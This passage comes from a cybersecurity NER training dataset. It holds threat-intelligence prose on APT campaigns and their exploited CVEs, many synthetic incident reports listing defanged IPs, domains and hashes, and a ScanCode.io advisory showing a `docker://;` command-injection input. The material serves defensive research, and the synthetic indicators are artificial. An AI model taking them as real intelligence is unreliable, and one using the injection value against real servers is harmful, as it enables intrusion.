reserves more advanced TTPs and malware only for high-value targets . Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015 . This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. 
, manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse . With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region . Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 . The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 . Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina . According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer . The BalkanDoor backdoor does not implement any Exfiltration channel . APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . 
Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher . The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 . Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 . One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 . Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China . Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . 
360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . Here , we investigate a campaign targeting an Asian government organization . We observed another campaign targeting an organisation located in Lebanon . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword[.]exe . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . 
From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . 
Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . Attackers use it to create , expand and cement their foothold in compromised environments . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd[.]exe . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library ( DLL ) , as described below , to create a reverse shell and connect to a remote host . 
Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . After injecting Meterpreter into memory , the attacker had complete control of the infected device . IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . CTU research indicates that LYCEUM may have been active as early as April 2018 . 
In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment . LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments . However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment . LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector . 
Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East . The group behind these attacks has stolen gigabytes of confidential documents , mostly from military organizations . Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns . ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware . Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . Machete is interested in files that describe navigation routes and positioning using military grids . The Machete group sends very specific emails directly to its victims , and these change from target to target . The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 . Previous versions were described by Kaspersky in 2014 and Cylance in 2017 . Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation . The GoogleUpdate[ . ]exe component is responsible for communicating with the remote C&C server . ESET has been tracking this threat for months and has observed several changes , sometimes within weeks . This ACT , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries . 
The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . ESET researchers have detected an ongoing , highly targeted campaign , with a majority of the targets being military organizations . The group behind Machete uses effective spearphishing techniques . First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries . In 2018 Machete reappeared with new code and new features . As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country . Machete was active and constantly working on very effective spearphishing campaigns . In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day . Machete relies on spearphishing to compromise its targets . They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails . 
Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised . Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server . This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete . Machete is malware that has been developed and is actively maintained by a Spanish-speaking group . Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years . By introducing small changes to their code and infrastructure , the group has bypassed several security products . OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records . They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking . 
In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims . The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia . There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server . We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India . The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system . The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their LOCs of activity to include the medical , pharmaceutical , media , energy and manufacturing industries . 
The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"Organization: Kaspersky": [[13, 22], [15763, 15772], [16998, 17007]], "Organization: video game industry": [[737, 756]], "Indicator: BalkanRAT": [[793, 802], [1833, 1842]], "Indicator: BalkanDoor": [[914, 924], [1847, 1857], [2111, 2121]], "Organization: financial": [[1160, 1169]], "Organization: Serbian security": [[1278, 1294]], "Vulnerability: exploit": [[1771, 1778], [2270, 2277], [6140, 6147], [6343, 6350], [7091, 7098], [7122, 7129]], "Vulnerability: CVE-2018-20250": [[1811, 1825], [2307, 2321]], "Malware: BalkanRAT": [[2424, 2433]], "Malware: BalkanDoor backdoor": [[2489, 2508]], "Malware: ADORE.XSEC": [[2571, 2581]], "System: Linux": [[2586, 2591], [2665, 2670]], "Indicator: backdoor": [[2689, 2697]], "Indicator: BalkanRAT malware": [[2809, 2826]], "Malware: POISONPLUG": [[2926, 2936]], "Organization: Encrypt": [[3209, 3216]], "Organization: CERT 360": [[3399, 3407]], "Organization: government sites": [[3569, 3585]], "Organization: enterprises": [[3602, 3613]], "Organization: government": [[3732, 3742], [3840, 3850], [7980, 7990]], "Organization: organisations": [[3762, 3775]], "Organization: government agencies": [[4074, 4093]], "Organization: 360-CERT": [[4151, 4159]], "Organization: Anomali": [[4546, 4553]], "Organization: 360 Threat Intelligence Center": [[4769, 4799]], "Malware: China Chopper": [[4936, 4949], [5336, 5349], [5481, 5494]], "Indicator: China Chopper": [[5127, 5140], [5685, 5698], [7016, 7029]], "Organization: Cisco Talos": [[5301, 5312]], "Organization: government organization": [[5583, 5606]], "Indicator: Mimikatz Lite": [[5946, 5959]], "Indicator: GetPassword.exe": [[5963, 5980]], "Indicator: tool": [[5987, 5991]], "Vulnerability: CVE-2018–8440": [[6148, 6161]], "Vulnerability: vulnerability": [[6190, 6203], [8819, 8832]], "System: Windows": [[6207, 6214], [6524, 6531], [7134, 7141]], "Vulnerability: proof-of-concept": [[6326, 
6342]], "Organization: Palo Alto": [[6954, 6963]], "Vulnerability: CVE-2015-0062": [[7158, 7171]], "Vulnerability: CVE-2015-1701": [[7174, 7187]], "Vulnerability: CVE-2016-0099": [[7192, 7205]], "Organization: Microsoft": [[7375, 7384], [20902, 20911]], "Vulnerability: CVE-2017-11882": [[7408, 7422]], "Vulnerability: CVE-2018-0802": [[7434, 7447]], "Organization: military": [[7995, 8003], [14783, 14791], [16887, 16895], [17401, 17409], [17845, 17853], [18027, 18035], [18545, 18553]], "Organization: Presidential Administration": [[8344, 8371]], "Organization: organizations": [[8479, 8492], [14792, 14805], [18849, 18862]], "Malware: documents": [[8571, 8580]], "Malware: (RMS)": [[8676, 8681]], "Indicator: archive": [[8751, 8758]], "Organization: e-commerce environments": [[9073, 9096]], "Organization: retailers": [[9581, 9590]], "Organization: hospitality sector": [[9612, 9630]], "Malware: More_eggs backdoor": [[9690, 9708], [11996, 12014]], "Malware: Comodo code-signing certificates": [[9859, 9891]], "Indicator: More_eggs backdoor": [[10133, 10151], [10331, 10349]], "Indicator: More_eggs malware": [[10185, 10202]], "Indicator: cmd.exe": [[10286, 10295]], "Organization: X-Force IRIS": [[10298, 10310]], "Malware: WMI": [[10620, 10623]], "System: PowerShell": [[10628, 10638], [12191, 12201]], "Malware: More_eggs": [[10912, 10921], [11482, 11491]], "Malware: Mimikatz": [[11009, 11017]], "Malware: More_eggs JScript backdoor": [[11117, 11143], [11381, 11407]], "Indicator: Mimikatz": [[11146, 11154]], "Malware: offensive security tools": [[11541, 11565]], "Malware: PowerShell scripts": [[11570, 11588]], "Organization: IBM X-Force IRIS": [[11740, 11756]], "Malware: tools": [[11871, 11876]], "Organization: strategic national importance": [[12294, 12323]], "Organization: oil and gas": [[12336, 12347]], "Organization: telecommunications": [[12361, 12379]], "Organization: CTU": [[12382, 12385], [12922, 12925], [13353, 13356], [14002, 14005], [14405, 14408]], "Malware: 
post-intrusion tools": [[13225, 13245]], "Indicator: DanBot": [[13326, 13332]], "Malware: Get-LAPSP.ps1": [[13371, 13384]], "Malware: PowerShell script": [[13390, 13407]], "Malware: DanBot": [[13504, 13510]], "Malware: maldocs": [[13606, 13613]], "Organization: executives": [[13796, 13806]], "Organization: HR staff": [[13809, 13817]], "Organization: IT personnel": [[13824, 13836]], "Malware: maldoc": [[13879, 13885]], "Organization: ICS": [[13910, 13913]], "Organization: OT staff": [[13917, 13925]], "Organization: energy organizations": [[14191, 14211]], "Malware: malware": [[14908, 14915]], "Organization: ESET": [[14963, 14967], [16000, 16004], [16779, 16783], [17260, 17264], [18365, 18369]], "Organization: Ecuadorean military": [[15142, 15161]], "Organization: describe navigation routes": [[15417, 15443]], "Indicator: Previous versions": [[15727, 15744]], "Indicator: GoogleUpdate.exe": [[15907, 15927]], "Indicator: malware": [[16121, 16128]], "Organization: Cylance": [[17035, 17042]], "Indicator: They": [[19258, 19262]], "Organization: report": [[19728, 19734]], "Organization: industrial sectors": [[20039, 20057]], "Indicator: document files": [[20873, 20887]], "Organization: financial institutions": [[21075, 21097]], "Organization: medical": [[21275, 21282]], "Organization: pharmaceutical": [[21285, 21299]], "Organization: media": [[21302, 21307]], "Organization: energy": [[21310, 21316]], "Organization: manufacturing": [[21321, 21334]], "Malware: ServHelper": [[21401, 21411]], "Malware: FlawedAmmy RAT": [[21416, 21430]]}, "info": {"id": "cyberner_stix_train_007910", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from admin@urgent-notice[ . ]online and ceo@mail-service[.]info, spoofing legitimate services. Victims were directed to hxxps://edge-gateway[ . ]online/callback which hosted a credential harvesting page on data-gateway[ . ]net. A secondary link hxxps://cdn-cdn[ . 
]com/admin/config delivered Ryuk (SHA256: c1547549316258ca58cf61442f777b5f1f9a6c3aa89da7c89417df160ae17c29). The malware was saved to C:\\Windows\\Tasks\\chrome_helper.exe and established C2 with 192 [ . ] 43 [ . ] 162 [ . ] 24.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: admin@urgent-notice.online": [[103, 133]], "Indicator: ceo@mail-service.info": [[138, 161]], "Indicator: https://edge-gateway.online/callback": [[218, 258]], "Indicator: data-gateway.net": [[304, 324]], "Indicator: https://cdn-cdn.com/admin/config": [[343, 379]], "Malware: Ryuk": [[390, 394]], "Indicator: c1547549316258ca58cf61442f777b5f1f9a6c3aa89da7c89417df160ae17c29": [[404, 468]], "Indicator: 192.43.162.24": [[555, 586]]}, "info": {"id": "synth_v2_00914", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 74 [ . ] 109 [ . ] 82, the Microsoft MSRC IR team identified SystemBC running as C:\\Program Files\\Common Files\\backdoor.elf. The threat actor, believed to be Midnight Blizzard, used BloodHound for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to gatewayproxy[ . ]xyz and cloud-update[.]link. The initial dropper (SHA256: 0be1316b3afdc0e2e6ae7e28996840f002af825af6cf86d7fb0e570c56a02fe6) was delivered via a phishing email from info@mail-service[ . ]info. A second C2 node was observed at 192 [ . ] 194 [ . ] 31 [ . 
] 240, with a persistence mechanism writing to /usr/local/bin/config.dat.", "spans": {"Indicator: 172.74.109.82": [[64, 95]], "Organization: Microsoft MSRC": [[101, 115]], "Malware: SystemBC": [[135, 143]], "Indicator: gatewayproxy.xyz": [[357, 377]], "Indicator: cloud-update.link": [[382, 401]], "Indicator: 0be1316b3afdc0e2e6ae7e28996840f002af825af6cf86d7fb0e570c56a02fe6": [[432, 496]], "Indicator: info@mail-service.info": [[538, 564]], "Indicator: 192.194.31.240": [[599, 631]]}, "info": {"id": "synth_v2_00374", "source": "defanged_augment"}} {"text": "Malware Analysis Report: ShadowPad (MD5: 561b92984a9ce23ceb8228b961011f42). Upon execution on Ubuntu 22.04, the sample creates /dev/shm/dropper.ps1 and injects into legitimate processes. Network analysis shows beaconing to 172[.]190[.]74[.]83 every 60 seconds and DNS queries to gatewaysecure[ . ]cc. The second stage was fetched from hxxps://mailrelay[ . ]tech/download/update.exe and written to C:\\Program Files\\Common Files\\csrss.exe. The payload uses Sliver-style techniques for defense evasion. A secondary hash (SHA1: e2fd0b75be730bbf9734bd05078c91dab4f4b7e4) was extracted from the unpacked payload.", "spans": {"Malware: ShadowPad": [[25, 34]], "Indicator: 561b92984a9ce23ceb8228b961011f42": [[41, 73]], "System: Ubuntu 22.04": [[94, 106]], "Indicator: 172.190.74.83": [[223, 242]], "Indicator: gatewaysecure.cc": [[279, 299]], "Indicator: https://mailrelay.tech/download/update.exe": [[335, 381]], "Indicator: e2fd0b75be730bbf9734bd05078c91dab4f4b7e4": [[524, 564]]}, "info": {"id": "synth_v2_00571", "source": "defanged_augment"}} {"text": "Lazarus Group used Net-GPPPassword for credential dumping and ADFind for lateral movement. Credentials were exfiltrated to 158[.]118[.]81[.]238. The attacker pivoted to 216 [ . ] 3 [ . ] 118 [ . ] 160 and dropped C:\\Recovery\\WindowsRE\\agent.exe (MD5: 1d62870c66779c42edf8de1f8d3734f6). C2 traffic was routed through data-backup[[ . 
]]site.", "spans": {"Indicator: 158.118.81.238": [[123, 143]], "Indicator: 216.3.118.160": [[169, 200]], "Indicator: 1d62870c66779c42edf8de1f8d3734f6": [[251, 283]], "Indicator: data-backup[.]site": [[316, 338]]}, "info": {"id": "synth_00042", "source": "defanged_augment"}} {"text": "Malware Analysis Report: BumbleBee (SHA1: b8f5787ce46ec96d8f909a4d60aca6d067d0b338). Upon execution on VMware ESXi, the sample creates C:\\Users\\Public\\Documents\\shell.php and injects into legitimate processes. Network analysis shows beaconing to 192[.]222[.]136[.]27 every 60 seconds and DNS queries to edgestatic[.]live. The second stage was fetched from hxxp://staticnode[ . ]live/login and written to C:\\Users\\Public\\Documents\\shell.php. The payload uses Metasploit-style techniques for defense evasion. A secondary hash (MD5: 7c72780a56275f245e7bda7e0a49630b) was extracted from the unpacked payload.", "spans": {"Malware: BumbleBee": [[25, 34]], "Indicator: b8f5787ce46ec96d8f909a4d60aca6d067d0b338": [[42, 82]], "System: VMware ESXi": [[103, 114]], "Indicator: 192.222.136.27": [[246, 266]], "Indicator: edgestatic.live": [[303, 320]], "Indicator: http://staticnode.live/login": [[356, 388]], "Indicator: 7c72780a56275f245e7bda7e0a49630b": [[530, 562]]}, "info": {"id": "synth_v2_00509", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 11[.]181[.]71[.]120, the Trend Micro IR team identified Emotet running as /opt/app/bin/sam.hive. The threat actor, believed to be OilRig, used Burp Suite for credential harvesting and BloodHound for lateral movement. Exfiltrated data was sent to mail-node[ . ]site and secure-login[.]tech. The initial dropper (SHA1: bf1feef567cdc17543d10c3daba5dc737e63dee9) was delivered via a phishing email from service@secure-verify[.]net. 
A second C2 node was observed at 71[.]4[.]81[.]92, with a persistence mechanism writing to C:\\Windows\\System32\\backdoor.elf.", "spans": {"Indicator: 11.181.71.120": [[64, 83]], "Organization: Trend Micro": [[89, 100]], "Malware: Emotet": [[120, 126]], "Indicator: mail-node.site": [[310, 328]], "Indicator: secure-login.tech": [[333, 352]], "Indicator: bf1feef567cdc17543d10c3daba5dc737e63dee9": [[381, 421]], "Indicator: service@secure-verify.net": [[463, 490]], "Indicator: 71.4.81.92": [[525, 541]]}, "info": {"id": "synth_v2_00407", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Huntress identified a large-scale phishing operation. Emails originated from info@account-update[.]xyz and report@account-update[.]xyz, spoofing legitimate services. Victims were directed to hxxp://mail-cache[.]club/download/update.exe which hosted a credential harvesting page on login-cache[ . ]tech. A secondary link hxxp://authapi[ . ]tech/wp-content/uploads/doc.php delivered RemcosRAT (SHA1: 95744d675ee05e8e5951cf6cfc30c9339e0fcbb4). The malware was saved to C:\\Users\\admin\\Desktop\\helper.sh and established C2 with 63 [ . ] 237 [ . ] 78 [ . 
] 166.", "spans": {"Organization: Huntress": [[26, 34]], "Indicator: info@account-update.xyz": [[103, 128]], "Indicator: report@account-update.xyz": [[133, 160]], "Indicator: hxxp://mail-cache.club/download/update.exe": [[217, 261]], "Indicator: login-cache.tech": [[307, 327]], "Indicator: http://authapi.tech/wp-content/uploads/doc.php": [[346, 396]], "Malware: RemcosRAT": [[407, 416]], "Indicator: 95744d675ee05e8e5951cf6cfc30c9339e0fcbb4": [[424, 464]], "Indicator: 63.237.78.166": [[549, 580]]}, "info": {"id": "synth_v2_00865", "source": "defanged_augment"}} {"text": "A common misconfiguration attempts to download the non-existant file at hxxp://www[.]server[.]com/sqlite3.dll", "spans": {"Indicator: http://www.server.com/sqlite3.dll": [[72, 109]]}, "info": {"id": "cyner2_train_006411", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 172 [ . ] 10 [ . ] 201 [ . ] 143, the Cisco Talos IR team identified RemcosRAT running as /opt/app/bin/taskhost.exe. The threat actor, believed to be Lazarus Group, used WinPEAS for credential harvesting and Merlin for lateral movement. Exfiltrated data was sent to secure-static[.]club and update-edge[ . ]online. The initial dropper (SHA1: ee15444db6355986caa1363ebb0bee0d2c43b820) was delivered via a phishing email from security@secure-verify[ . ]net. 
A second C2 node was observed at 17[.]63[.]106[.]248, with a persistence mechanism writing to C:\\Users\\admin\\AppData\\Local\\Temp\\payload.bin.", "spans": {"Indicator: 172.10.201.143": [[64, 96]], "Organization: Cisco Talos": [[102, 113]], "Malware: RemcosRAT": [[133, 142]], "Indicator: secure-static.club": [[330, 350]], "Indicator: update-edge.online": [[355, 377]], "Indicator: ee15444db6355986caa1363ebb0bee0d2c43b820": [[406, 446]], "Indicator: security@secure-verify.net": [[488, 518]], "Indicator: 17.63.106.248": [[553, 572]]}, "info": {"id": "synth_v2_00338", "source": "defanged_augment"}} {"text": "ScanCode[.]io is a server to script and automate software composition analysis with ScanPipe pipelines. Prior to version 32.5.1, the software has a possible command injection vulnerability in the docker fetch process as it allows to append malicious commands in the `docker_reference` parameter.\n\nIn the function `scanpipe/pipes/fetch.py:fetch_docker_image` the parameter `docker_reference` is user controllable. The `docker_reference` variable is then passed to the vulnerable function `get_docker_image_platform`. However, the `get_docker_image_plaform` function constructs a shell command with the passed `docker_reference`. The `pipes.run_command` then executes the shell command without any prior sanitization, making the function vulnerable to command injections. A malicious user who is able to create or add inputs to a project can inject commands. Although the command injections are blind and the user will not receive direct feedback without logs, it is still possible to cause damage to the server/container. The vulnerability appears for example if a malicious user adds a semicolon after the input of `docker://;`, it would allow appending malicious commands.\n\nVersion 32.5.1 contains a patch for this issue. 
The `docker_reference` input should be sanitized to avoid command injections and, as a workaround, one may avoid creating commands with user controlled input directly.", "spans": {"Indicator: ScanCode.io": [[0, 13]], "Vulnerability: command injection": [[157, 174]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-39523"}} {"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64[.]251[.]19[.]216 [REDACTED][ . ]myftp[ . ]biz . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"Malware: Shedun": [[82, 88]], "Indicator: 64.251.19.216": [[285, 304]], "Indicator: [REDACTED].myftp.biz": [[305, 333]], "Malware: Royal": [[358, 363]], "Malware: BlackSuit": [[368, 377]]}, "info": {"id": "cyberner_stix_train_002100", "source": "defanged_augment"}} {"text": "The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft[ . ]NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"Indicator: Microsoft.NET": [[91, 108]]}, "info": {"id": "dnrti_train_001585", "source": "defanged_augment"}} {"text": "IOC Bulletin - DarkSide Campaign:\nNetwork Indicators:\n- 202 [ . ] 218 [ . ] 84 [ . ] 147\n- 203 [ . ] 94 [ . ] 193 [ . ] 98\n- 10[.]73[.]167[.]115\n- proxy-data[ . ]top\n- gatewayedge[ . ]live\nURLs:\n- hxxps://proxy-cdn[ . ]club/gate.php\n- hxxps://cloud-data[ . ]info/callback\nEmail Senders:\n- contact@identity-verify[ . 
